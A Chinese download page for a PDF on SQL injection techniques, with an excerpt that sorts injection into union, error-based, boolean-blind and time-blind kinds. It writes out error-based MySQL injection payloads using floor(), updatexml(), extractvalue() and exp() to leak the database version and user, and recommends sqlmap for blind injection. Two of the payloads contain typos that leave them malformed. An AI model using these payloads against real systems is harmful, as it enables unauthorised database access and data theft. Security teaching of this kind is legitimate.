Java资源分享网 - 专业的Java学习网站 学Java,上Java资源分享网
SQL注入思路详解 PDF 下载
匿名网友发布于:2024-04-15 12:05:22
(侵权举报)
(假如点击没反应,多刷新两次就OK!)

SQL注入思路详解  PDF 下载 图1

 

 

主要内容:

. 确认SQL 注入方式

SQL注入按照注入方式分类可分为两类

显示注入

Union query #联合查询注入,通过union联合查询获取查询结

Error based #报错注入,通过报错信息获取查询结果

盲注

Boolean based blind #布尔盲注,通过应用返回不同的值判断田间真

Time based blind #时间盲注,通过不同的时间延迟推断条件真假

优先级:union query ≥ error based ≥ Boolean based blind ≥ time based blind

union注入:比较简单,就不赘述,如有需求可至主页查看博客

报错注入:

前提:应用可以输出数据库报错信息

floor()

And (select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)

Upadtexml()

And 1=(updatexml(1.concat(0x3a,(select user()),1))

Extractvalue()

And extractvalue(1,concat(0x5c,(select user())))

Exp()

And exp (~select * from(select user())a))

布尔盲注

时间延迟注入

这俩用sqlmap吧,手工会累死人的